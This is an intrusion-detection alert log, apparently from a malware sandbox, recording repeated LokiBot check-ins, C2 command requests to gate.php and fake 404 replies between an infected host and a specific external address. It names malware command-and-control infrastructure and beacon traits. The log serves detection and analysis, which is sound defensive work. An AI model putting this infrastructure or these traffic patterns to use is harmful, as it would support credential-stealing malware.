                                    12/03/20-10:03:28.370667TCP2025381ET TROJAN LokiBot Checkin4988880192.168.2.347.91.79.163
                                    12/03/20-10:03:28.370667TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.2.347.91.79.163
                                    12/03/20-10:03:28.370667TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988880192.168.2.347.91.79.163
                                    12/03/20-10:03:28.577908TCP2025483ET TROJAN LokiBot Fake 404 Response804988847.91.79.163192.168.2.3
                                    12/03/20-10:03:28.995903TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.2.347.91.79.163
                                    12/03/20-10:03:28.995903TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.2.347.91.79.163
                                    12/03/20-10:03:28.995903TCP2025381ET TROJAN LokiBot Checkin4988980192.168.2.347.91.79.163
                                    12/03/20-10:03:28.995903TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.2.347.91.79.163
                                    12/03/20-10:03:28.995903TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988980192.168.2.347.91.79.163
                                    12/03/20-10:03:29.054012TCP2025483ET TROJAN LokiBot Fake 404 Response804988947.91.79.163192.168.2.3
                                    12/03/20-10:03:29.261436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.2.347.91.79.163
                                    12/03/20-10:03:29.261436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.2.347.91.79.163
                                    12/03/20-10:03:29.261436TCP2025381ET TROJAN LokiBot Checkin4989080192.168.2.347.91.79.163
                                    12/03/20-10:03:29.261436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.2.347.91.79.163
                                    12/03/20-10:03:29.261436TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989080192.168.2.347.91.79.163
                                    12/03/20-10:03:29.322723TCP2025483ET TROJAN LokiBot Fake 404 Response804989047.91.79.163192.168.2.3
                                    12/03/20-10:03:29.906200TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989180192.168.2.347.91.79.163
                                    12/03/20-10:03:29.906200TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989180192.168.2.347.91.79.163
                                    12/03/20-10:03:29.906200TCP2025381ET TROJAN LokiBot Checkin4989180192.168.2.347.91.79.163
                                    12/03/20-10:03:29.906200TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989180192.168.2.347.91.79.163
                                    12/03/20-10:03:29.906200TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989180192.168.2.347.91.79.163
                                    12/03/20-10:03:29.963618TCP2025483ET TROJAN LokiBot Fake 404 Response804989147.91.79.163192.168.2.3
                                    12/03/20-10:03:30.476261TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.2.347.91.79.163
                                    12/03/20-10:03:30.476261TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.2.347.91.79.163
                                    12/03/20-10:03:30.476261TCP2025381ET TROJAN LokiBot Checkin4989280192.168.2.347.91.79.163
                                    12/03/20-10:03:30.476261TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.2.347.91.79.163
                                    12/03/20-10:03:30.476261TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989280192.168.2.347.91.79.163
                                    12/03/20-10:03:30.536401TCP2025483ET TROJAN LokiBot Fake 404 Response804989247.91.79.163192.168.2.3
                                    12/03/20-10:03:30.994100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989380192.168.2.347.91.79.163
                                    12/03/20-10:03:30.994100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989380192.168.2.347.91.79.163
                                    12/03/20-10:03:30.994100TCP2025381ET TROJAN LokiBot Checkin4989380192.168.2.347.91.79.163
                                    12/03/20-10:03:30.994100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989380192.168.2.347.91.79.163
                                    12/03/20-10:03:30.994100TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989380192.168.2.347.91.79.163
                                    12/03/20-10:03:31.054595TCP2025483ET TROJAN LokiBot Fake 404 Response804989347.91.79.163192.168.2.3
                                    12/03/20-10:03:31.259183TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989480192.168.2.347.91.79.163
                                    12/03/20-10:03:31.259183TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989480192.168.2.347.91.79.163
                                    12/03/20-10:03:31.259183TCP2025381ET TROJAN LokiBot Checkin4989480192.168.2.347.91.79.163
                                    12/03/20-10:03:31.259183TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989480192.168.2.347.91.79.163
                                    12/03/20-10:03:31.259183TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989480192.168.2.347.91.79.163
                                    12/03/20-10:03:31.328925TCP2025483ET TROJAN LokiBot Fake 404 Response804989447.91.79.163192.168.2.3
                                    12/03/20-10:03:31.751251TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989580192.168.2.347.91.79.163
                                    12/03/20-10:03:31.751251TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989580192.168.2.347.91.79.163
                                    12/03/20-10:03:31.751251TCP2025381ET TROJAN LokiBot Checkin4989580192.168.2.347.91.79.163
                                    12/03/20-10:03:31.751251TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989580192.168.2.347.91.79.163
                                    12/03/20-10:03:31.751251TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989580192.168.2.347.91.79.163
                                    12/03/20-10:03:31.807705TCP2025483ET TROJAN LokiBot Fake 404 Response804989547.91.79.163192.168.2.3
                                    12/03/20-10:03:32.014316TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989680192.168.2.347.91.79.163
                                    12/03/20-10:03:32.014316TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989680192.168.2.347.91.79.163
                                    12/03/20-10:03:32.014316TCP2025381ET TROJAN LokiBot Checkin4989680192.168.2.347.91.79.163
                                    12/03/20-10:03:32.014316TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989680192.168.2.347.91.79.163
                                    12/03/20-10:03:32.014316TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989680192.168.2.347.91.79.163
                                    12/03/20-10:03:32.077873TCP2025483ET TROJAN LokiBot Fake 404 Response804989647.91.79.163192.168.2.3
                                    12/03/20-10:03:32.604345TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989780192.168.2.347.91.79.163
                                    12/03/20-10:03:32.604345TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989780192.168.2.347.91.79.163
                                    12/03/20-10:03:32.604345TCP2025381ET TROJAN LokiBot Checkin4989780192.168.2.347.91.79.163
                                    12/03/20-10:03:32.604345TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989780192.168.2.347.91.79.163
                                    12/03/20-10:03:32.604345TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989780192.168.2.347.91.79.163
                                    12/03/20-10:03:32.665530TCP2025483ET TROJAN LokiBot Fake 404 Response804989747.91.79.163192.168.2.3
                                    12/03/20-10:03:32.863168TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989880192.168.2.347.91.79.163
                                    12/03/20-10:03:32.863168TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989880192.168.2.347.91.79.163
                                    12/03/20-10:03:32.863168TCP2025381ET TROJAN LokiBot Checkin4989880192.168.2.347.91.79.163
                                    12/03/20-10:03:32.863168TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989880192.168.2.347.91.79.163
                                    12/03/20-10:03:32.863168TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989880192.168.2.347.91.79.163
                                    12/03/20-10:03:32.924295TCP2025483ET TROJAN LokiBot Fake 404 Response804989847.91.79.163192.168.2.3
                                    12/03/20-10:03:33.437469TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989980192.168.2.347.91.79.163
                                    12/03/20-10:03:33.437469TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989980192.168.2.347.91.79.163
                                    12/03/20-10:03:33.437469TCP2025381ET TROJAN LokiBot Checkin4989980192.168.2.347.91.79.163
                                    12/03/20-10:03:33.437469TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989980192.168.2.347.91.79.163
                                    12/03/20-10:03:33.437469TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989980192.168.2.347.91.79.163
                                    12/03/20-10:03:33.495292TCP2025483ET TROJAN LokiBot Fake 404 Response804989947.91.79.163192.168.2.3
                                    12/03/20-10:03:33.936415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990080192.168.2.347.91.79.163
                                    12/03/20-10:03:33.936415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990080192.168.2.347.91.79.163
                                    12/03/20-10:03:33.936415TCP2025381ET TROJAN LokiBot Checkin4990080192.168.2.347.91.79.163
                                    12/03/20-10:03:33.936415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990080192.168.2.347.91.79.163
                                    12/03/20-10:03:33.936415TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990080192.168.2.347.91.79.163
                                    12/03/20-10:03:33.997836TCP2025483ET TROJAN LokiBot Fake 404 Response804990047.91.79.163192.168.2.3
                                    12/03/20-10:03:34.447921TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990180192.168.2.347.91.79.163
                                    12/03/20-10:03:34.447921TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990180192.168.2.347.91.79.163
                                    12/03/20-10:03:34.447921TCP2025381ET TROJAN LokiBot Checkin4990180192.168.2.347.91.79.163
                                    12/03/20-10:03:34.447921TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990180192.168.2.347.91.79.163
                                    12/03/20-10:03:34.447921TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990180192.168.2.347.91.79.163
                                    12/03/20-10:03:34.507785TCP2025483ET TROJAN LokiBot Fake 404 Response804990147.91.79.163192.168.2.3
                                    12/03/20-10:03:34.942138TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990280192.168.2.347.91.79.163
                                    12/03/20-10:03:34.942138TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990280192.168.2.347.91.79.163
                                    12/03/20-10:03:34.942138TCP2025381ET TROJAN LokiBot Checkin4990280192.168.2.347.91.79.163
                                    12/03/20-10:03:34.942138TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990280192.168.2.347.91.79.163
                                    12/03/20-10:03:34.942138TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990280192.168.2.347.91.79.163
                                    12/03/20-10:03:35.009032TCP2025483ET TROJAN LokiBot Fake 404 Response804990247.91.79.163192.168.2.3
                                    12/03/20-10:03:35.504309TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990380192.168.2.347.91.79.163
                                    12/03/20-10:03:35.504309TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990380192.168.2.347.91.79.163
                                    12/03/20-10:03:35.504309TCP2025381ET TROJAN LokiBot Checkin4990380192.168.2.347.91.79.163
                                    12/03/20-10:03:35.504309TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990380192.168.2.347.91.79.163
                                    12/03/20-10:03:35.504309TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990380192.168.2.347.91.79.163
                                    12/03/20-10:03:35.563085TCP2025483ET TROJAN LokiBot Fake 404 Response804990347.91.79.163192.168.2.3
                                    12/03/20-10:03:36.040003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990480192.168.2.347.91.79.163
                                    12/03/20-10:03:36.040003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990480192.168.2.347.91.79.163
                                    12/03/20-10:03:36.040003TCP2025381ET TROJAN LokiBot Checkin4990480192.168.2.347.91.79.163
                                    12/03/20-10:03:36.040003TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990480192.168.2.347.91.79.163
                                    12/03/20-10:03:36.040003TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990480192.168.2.347.91.79.163
                                    12/03/20-10:03:36.106219TCP2025483ET TROJAN LokiBot Fake 404 Response804990447.91.79.163192.168.2.3
                                    12/03/20-10:03:36.607418TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990580192.168.2.347.91.79.163
                                    12/03/20-10:03:36.607418TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990580192.168.2.347.91.79.163
                                    12/03/20-10:03:36.607418TCP2025381ET TROJAN LokiBot Checkin4990580192.168.2.347.91.79.163
                                    12/03/20-10:03:36.607418TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990580192.168.2.347.91.79.163
                                    12/03/20-10:03:36.607418TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990580192.168.2.347.91.79.163
                                    12/03/20-10:03:36.665095TCP2025483ET TROJAN LokiBot Fake 404 Response804990547.91.79.163192.168.2.3
                                    12/03/20-10:03:37.095774TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990680192.168.2.347.91.79.163
                                    12/03/20-10:03:37.095774TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990680192.168.2.347.91.79.163
                                    12/03/20-10:03:37.095774TCP2025381ET TROJAN LokiBot Checkin4990680192.168.2.347.91.79.163
                                    12/03/20-10:03:37.095774TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990680192.168.2.347.91.79.163
                                    12/03/20-10:03:37.095774TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990680192.168.2.347.91.79.163
                                    12/03/20-10:03:37.155846TCP2025483ET TROJAN LokiBot Fake 404 Response804990647.91.79.163192.168.2.3
                                    12/03/20-10:03:37.635993TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990780192.168.2.347.91.79.163
                                    12/03/20-10:03:37.635993TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990780192.168.2.347.91.79.163
                                    12/03/20-10:03:37.635993TCP2025381ET TROJAN LokiBot Checkin4990780192.168.2.347.91.79.163
                                    12/03/20-10:03:37.635993TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990780192.168.2.347.91.79.163
                                    12/03/20-10:03:37.635993TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990780192.168.2.347.91.79.163
                                    12/03/20-10:03:37.696414TCP2025483ET TROJAN LokiBot Fake 404 Response804990747.91.79.163192.168.2.3
                                    12/03/20-10:03:38.137931TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990880192.168.2.347.91.79.163
                                    12/03/20-10:03:38.137931TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990880192.168.2.347.91.79.163
                                    12/03/20-10:03:38.137931TCP2025381ET TROJAN LokiBot Checkin4990880192.168.2.347.91.79.163
                                    12/03/20-10:03:38.137931TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990880192.168.2.347.91.79.163
                                    12/03/20-10:03:38.137931TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990880192.168.2.347.91.79.163
                                    12/03/20-10:03:38.195618TCP2025483ET TROJAN LokiBot Fake 404 Response804990847.91.79.163192.168.2.3
                                    12/03/20-10:03:38.614970TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990980192.168.2.347.91.79.163
                                    12/03/20-10:03:38.614970TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990980192.168.2.347.91.79.163
                                    12/03/20-10:03:38.614970TCP2025381ET TROJAN LokiBot Checkin4990980192.168.2.347.91.79.163
                                    12/03/20-10:03:38.614970TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990980192.168.2.347.91.79.163
                                    12/03/20-10:03:38.614970TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990980192.168.2.347.91.79.163
                                    12/03/20-10:03:38.673676TCP2025483ET TROJAN LokiBot Fake 404 Response804990947.91.79.163192.168.2.3
                                    12/03/20-10:03:39.153875TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991080192.168.2.347.91.79.163
                                    12/03/20-10:03:39.153875TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991080192.168.2.347.91.79.163
                                    12/03/20-10:03:39.153875TCP2025381ET TROJAN LokiBot Checkin4991080192.168.2.347.91.79.163
                                    12/03/20-10:03:39.153875TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991080192.168.2.347.91.79.163
                                    12/03/20-10:03:39.153875TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991080192.168.2.347.91.79.163
                                    12/03/20-10:03:39.215094TCP2025483ET TROJAN LokiBot Fake 404 Response804991047.91.79.163192.168.2.3
                                    12/03/20-10:03:39.682728TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991180192.168.2.347.91.79.163
                                    12/03/20-10:03:39.682728TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991180192.168.2.347.91.79.163
                                    12/03/20-10:03:39.682728TCP2025381ET TROJAN LokiBot Checkin4991180192.168.2.347.91.79.163
                                    12/03/20-10:03:39.682728TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991180192.168.2.347.91.79.163
                                    12/03/20-10:03:39.682728TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991180192.168.2.347.91.79.163
                                    12/03/20-10:03:39.788076TCP2025483ET TROJAN LokiBot Fake 404 Response804991147.91.79.163192.168.2.3
                                    12/03/20-10:03:40.012777TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991280192.168.2.347.91.79.163
                                    12/03/20-10:03:40.012777TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991280192.168.2.347.91.79.163
                                    12/03/20-10:03:40.012777TCP2025381ET TROJAN LokiBot Checkin4991280192.168.2.347.91.79.163
                                    12/03/20-10:03:40.012777TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991280192.168.2.347.91.79.163
                                    12/03/20-10:03:40.012777TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991280192.168.2.347.91.79.163
                                    12/03/20-10:03:40.177683TCP2025483ET TROJAN LokiBot Fake 404 Response804991247.91.79.163192.168.2.3
                                    12/03/20-10:03:40.407026TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991380192.168.2.347.91.79.163
                                    12/03/20-10:03:40.407026TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991380192.168.2.347.91.79.163
                                    12/03/20-10:03:40.407026TCP2025381ET TROJAN LokiBot Checkin4991380192.168.2.347.91.79.163
                                    12/03/20-10:03:40.407026TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991380192.168.2.347.91.79.163
                                    12/03/20-10:03:40.407026TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991380192.168.2.347.91.79.163
                                    12/03/20-10:03:40.478810TCP2025483ET TROJAN LokiBot Fake 404 Response804991347.91.79.163192.168.2.3
                                    12/03/20-10:03:40.694808TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991480192.168.2.347.91.79.163
                                    12/03/20-10:03:40.694808TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991480192.168.2.347.91.79.163
                                    12/03/20-10:03:40.694808TCP2025381ET TROJAN LokiBot Checkin4991480192.168.2.347.91.79.163
                                    12/03/20-10:03:40.694808TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991480192.168.2.347.91.79.163
                                    12/03/20-10:03:40.694808TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991480192.168.2.347.91.79.163
                                    12/03/20-10:03:40.754847TCP2025483ET TROJAN LokiBot Fake 404 Response804991447.91.79.163192.168.2.3
                                    12/03/20-10:03:40.969555TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991580192.168.2.347.91.79.163
                                    12/03/20-10:03:40.969555TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991580192.168.2.347.91.79.163
                                    12/03/20-10:03:40.969555TCP2025381ET TROJAN LokiBot Checkin4991580192.168.2.347.91.79.163
                                    12/03/20-10:03:40.969555TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991580192.168.2.347.91.79.163
                                    12/03/20-10:03:40.969555TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991580192.168.2.347.91.79.163
                                    12/03/20-10:03:41.031967TCP2025483ET TROJAN LokiBot Fake 404 Response804991547.91.79.163192.168.2.3
                                    12/03/20-10:03:41.260655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991680192.168.2.347.91.79.163
                                    12/03/20-10:03:41.260655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991680192.168.2.347.91.79.163
                                    12/03/20-10:03:41.260655TCP2025381ET TROJAN LokiBot Checkin4991680192.168.2.347.91.79.163
                                    12/03/20-10:03:41.260655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991680192.168.2.347.91.79.163
                                    12/03/20-10:03:41.260655TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991680192.168.2.347.91.79.163
                                    12/03/20-10:03:41.322048TCP2025483ET TROJAN LokiBot Fake 404 Response804991647.91.79.163192.168.2.3
                                    12/03/20-10:03:41.552180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991780192.168.2.347.91.79.163
                                    12/03/20-10:03:41.552180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991780192.168.2.347.91.79.163
                                    12/03/20-10:03:41.552180TCP2025381ET TROJAN LokiBot Checkin4991780192.168.2.347.91.79.163
                                    12/03/20-10:03:41.552180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991780192.168.2.347.91.79.163
                                    12/03/20-10:03:41.552180TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991780192.168.2.347.91.79.163
                                    12/03/20-10:03:41.623253TCP2025483ET TROJAN LokiBot Fake 404 Response804991747.91.79.163192.168.2.3
                                    12/03/20-10:03:41.839243TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991880192.168.2.347.91.79.163
                                    12/03/20-10:03:41.839243TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991880192.168.2.347.91.79.163
                                    12/03/20-10:03:41.839243TCP2025381ET TROJAN LokiBot Checkin4991880192.168.2.347.91.79.163
                                    12/03/20-10:03:41.839243TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991880192.168.2.347.91.79.163
                                    12/03/20-10:03:41.839243TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991880192.168.2.347.91.79.163
                                    12/03/20-10:03:41.890986TCP2025483ET TROJAN LokiBot Fake 404 Response804991847.91.79.163192.168.2.3
                                    12/03/20-10:03:42.127761TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991980192.168.2.347.91.79.163
                                    12/03/20-10:03:42.127761TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991980192.168.2.347.91.79.163
                                    12/03/20-10:03:42.127761TCP2025381ET TROJAN LokiBot Checkin4991980192.168.2.347.91.79.163
                                    12/03/20-10:03:42.127761TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991980192.168.2.347.91.79.163
                                    12/03/20-10:03:42.127761TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991980192.168.2.347.91.79.163
                                    12/03/20-10:03:42.191510TCP2025483ET TROJAN LokiBot Fake 404 Response804991947.91.79.163192.168.2.3
                                    12/03/20-10:03:42.798963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992080192.168.2.347.91.79.163
                                    12/03/20-10:03:42.798963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992080192.168.2.347.91.79.163
                                    12/03/20-10:03:42.798963TCP2025381ET TROJAN LokiBot Checkin4992080192.168.2.347.91.79.163
                                    12/03/20-10:03:42.798963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992080192.168.2.347.91.79.163
                                    12/03/20-10:03:42.798963TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992080192.168.2.347.91.79.163
                                    12/03/20-10:03:42.862197TCP2025483ET TROJAN LokiBot Fake 404 Response804992047.91.79.163192.168.2.3
                                    12/03/20-10:03:43.096434TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992180192.168.2.347.91.79.163
                                    12/03/20-10:03:43.096434TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992180192.168.2.347.91.79.163
                                    12/03/20-10:03:43.096434TCP2025381ET TROJAN LokiBot Checkin4992180192.168.2.347.91.79.163
                                    12/03/20-10:03:43.096434TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992180192.168.2.347.91.79.163
                                    12/03/20-10:03:43.096434TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992180192.168.2.347.91.79.163
                                    12/03/20-10:03:43.192491TCP2025483ET TROJAN LokiBot Fake 404 Response804992147.91.79.163192.168.2.3
                                    12/03/20-10:03:43.408716TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992280192.168.2.347.91.79.163
                                    12/03/20-10:03:43.408716TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992280192.168.2.347.91.79.163
                                    12/03/20-10:03:43.408716TCP2025381ET TROJAN LokiBot Checkin4992280192.168.2.347.91.79.163
                                    12/03/20-10:03:43.408716TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992280192.168.2.347.91.79.163
                                    12/03/20-10:03:43.408716TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992280192.168.2.347.91.79.163
                                    12/03/20-10:03:43.473149TCP2025483ET TROJAN LokiBot Fake 404 Response804992247.91.79.163192.168.2.3
                                    12/03/20-10:03:43.685042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992380192.168.2.347.91.79.163
                                    12/03/20-10:03:43.685042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992380192.168.2.347.91.79.163
                                    12/03/20-10:03:43.685042TCP2025381ET TROJAN LokiBot Checkin4992380192.168.2.347.91.79.163
                                    12/03/20-10:03:43.685042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992380192.168.2.347.91.79.163
                                    12/03/20-10:03:43.685042TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992380192.168.2.347.91.79.163
                                    12/03/20-10:03:43.770552TCP2025483ET TROJAN LokiBot Fake 404 Response804992347.91.79.163192.168.2.3
                                    12/03/20-10:03:44.011091TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992480192.168.2.347.91.79.163
                                    12/03/20-10:03:44.011091TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992480192.168.2.347.91.79.163
                                    12/03/20-10:03:44.011091TCP2025381ET TROJAN LokiBot Checkin4992480192.168.2.347.91.79.163
                                    12/03/20-10:03:44.011091TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992480192.168.2.347.91.79.163
                                    12/03/20-10:03:44.011091TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992480192.168.2.347.91.79.163
                                    12/03/20-10:03:44.159612TCP2025483ET TROJAN LokiBot Fake 404 Response804992447.91.79.163192.168.2.3
                                    12/03/20-10:03:44.400610TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992580192.168.2.347.91.79.163
                                    12/03/20-10:03:44.400610TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992580192.168.2.347.91.79.163
                                    12/03/20-10:03:44.400610TCP2025381ET TROJAN LokiBot Checkin4992580192.168.2.347.91.79.163
                                    12/03/20-10:03:44.400610TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992580192.168.2.347.91.79.163
                                    12/03/20-10:03:44.400610TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992580192.168.2.347.91.79.163
                                    12/03/20-10:03:44.459861TCP2025483ET TROJAN LokiBot Fake 404 Response804992547.91.79.163192.168.2.3
                                    12/03/20-10:03:44.672942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992680192.168.2.347.91.79.163
                                    12/03/20-10:03:44.672942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992680192.168.2.347.91.79.163
                                    12/03/20-10:03:44.672942TCP2025381ET TROJAN LokiBot Checkin4992680192.168.2.347.91.79.163
                                    12/03/20-10:03:44.672942TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992680192.168.2.347.91.79.163
                                    12/03/20-10:03:44.672942TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992680192.168.2.347.91.79.163
                                    12/03/20-10:03:44.739667TCP2025483ET TROJAN LokiBot Fake 404 Response804992647.91.79.163192.168.2.3
                                    12/03/20-10:03:44.968766TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992780192.168.2.347.91.79.163
                                    12/03/20-10:03:44.968766TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992780192.168.2.347.91.79.163
                                    12/03/20-10:03:44.968766TCP2025381ET TROJAN LokiBot Checkin4992780192.168.2.347.91.79.163
                                    12/03/20-10:03:44.968766TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992780192.168.2.347.91.79.163
                                    12/03/20-10:03:44.968766TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992780192.168.2.347.91.79.163
